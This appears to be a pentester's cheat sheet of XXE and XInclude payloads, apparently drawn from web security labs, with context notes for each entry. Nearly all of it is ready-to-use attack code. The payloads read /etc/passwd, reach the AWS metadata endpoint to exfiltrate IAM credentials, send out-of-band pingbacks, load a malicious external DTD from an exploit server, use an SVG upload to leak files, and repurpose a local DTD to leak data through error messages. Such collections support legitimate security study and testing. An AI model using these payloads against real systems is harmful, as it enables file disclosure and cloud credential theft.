[XXE - XEE - XML External Entity - HackTricks](https://book.hacktricks.wiki/en/pentesting-web/xxe-xee-xml-external-entity.html#xxe---xee---xml-external-entity) [XXE Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/XXE%20Injection) ##### XXE – File disclosure via external entity (no encoding) ```http <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]> <stockCheck> <productId>&xxe;</productId> <storeId>1</storeId> </stockCheck> ``` **Context:** XML input parsed with external entity support enabled **Encoding:** None **Source:** [[1. Exploiting XXE using external entities to retrieve files]] --- ##### XXE – SSRF to EC2 Metadata Service (IAM credential exfiltration) ```http <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE test [ <!ENTITY xxe SYSTEM "http://169.254.169.254/latest/meta-data/iam/security-credentials/admin"> ]> <stockCheck> <productId>&xxe;</productId> <storeId>1</storeId> </stockCheck> ``` **Context:** XML parsed insecurely with external entity support, allowing SSRF to internal AWS metadata endpoint **Encoding:** None **Source:** [[2. Exploiting XXE to perform SSRF attacks]] --- ##### XXE – Blind with OOB interaction (DNS/HTTP pingback via Collaborator) ```http <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE stockCheck [ <!ENTITY xxe SYSTEM "http://YOUR-COLLAB-ID.burpcollaborator.net"> ]> <stockCheck> <productId>&xxe;</productId> </stockCheck> ``` **Context:** XML parsed silently with external entity support; vulnerable endpoint does not reflect any input in response **Encoding:** None **Source:** [[3. Blind XXE with out-of-band interaction]] --- ##### XXE – Blind via parameter entity injection (OOB DNS/HTTP) ```http <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE stockCheck [ <!ENTITY % xxe SYSTEM "http://YOUR-COLLABORATOR-ID.burpcollaborator.net"> %xxe; ]> <stockCheck> <productId>1</productId> </stockCheck> ``` **Context:** External entity definitions blocked, but parameter entity expansion is still allowed in DTD **Encoding:** None **Source:** [[4. Blind XXE with out-of-band interaction via XML parameter entities]] --- ##### XXE – Blind file exfiltration via error message (external DTD) ```http <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE foo [<!ENTITY % xxe SYSTEM "https://exploit-server.net/evil"> %xxe;]> <stockCheck> <productId>1</productId> </stockCheck> ``` **Context:** XML parser does not return parsed data, but leaks file contents through an error message triggered by entity expansion **Encoding:** None **Source:** [[6. Exploiting blind XXE to retrieve data via error messages]] **Malicious DTD (`evil`):** ```xml <!ENTITY % file SYSTEM "file:///etc/passwd"> <!ENTITY % eval "<!ENTITY &#x25; exfil SYSTEM 'file:///invalid/%file;'>"> %eval; %exfil; ``` --- ##### XInclude – Local file retrieval via XML inclusion directive ```js <foo xmlns:xi="http://www.w3.org/2001/XInclude"><xi:include parse="text" href="file:///etc/passwd"/></foo> ``` **Context:** User input is embedded into an XML structure parsed server-side; DTDs are restricted but XInclude is enabled **Encoding:** URL-encoding **Source:** [[7. Exploiting XInclude to retrieve files]] --- ##### XXE – File disclosure via SVG avatar upload (Apache Batik) ```xml <?xml version="1.0" standalone="yes"?> <!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///etc/hostname"> ]> <svg width="128px" height="128px" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1"> <text font-size="16" x="0" y="16">&xxe;</text> </svg> ``` **Context:** SVG avatar uploaded to a blog post comment; parsed by Apache Batik which supports external entity resolution **Encoding:** None **Source:** [[8. Exploiting XXE via image file upload]] --- ##### XXE – File disclosure via local DTD hijack (ISOamso redefinition) ```http <!DOCTYPE message [ <!ENTITY % local_dtd SYSTEM "file:///usr/share/yelp/dtd/docbookx.dtd"> <!ENTITY % ISOamso ' <!ENTITY &#x25; file SYSTEM "file:///etc/passwd"> <!ENTITY &#x25; eval "<!ENTITY &#x26;#x25; error SYSTEM &#x27;file:///nonexistent/&#x25;file;&#x27;>"> &#x25;eval; &#x25;error; '> %local_dtd; ]> ``` **Context:** Application parses user-injected XML but blocks user-defined DTDs. However, it allows referencing **local system DTDs**, such as the GNOME `docbookx.dtd`, and accepts redefinition of its entities like `%ISOamso`. **Encoding:** Hex/decimal entity encoding used to bypass filters (`&#x25;` = `%`, `&#x26;` = `&`, `&#x27;` = `'`) **Source:** [[9. Exploiting XXE to retrieve data by repurposing a local DTD]]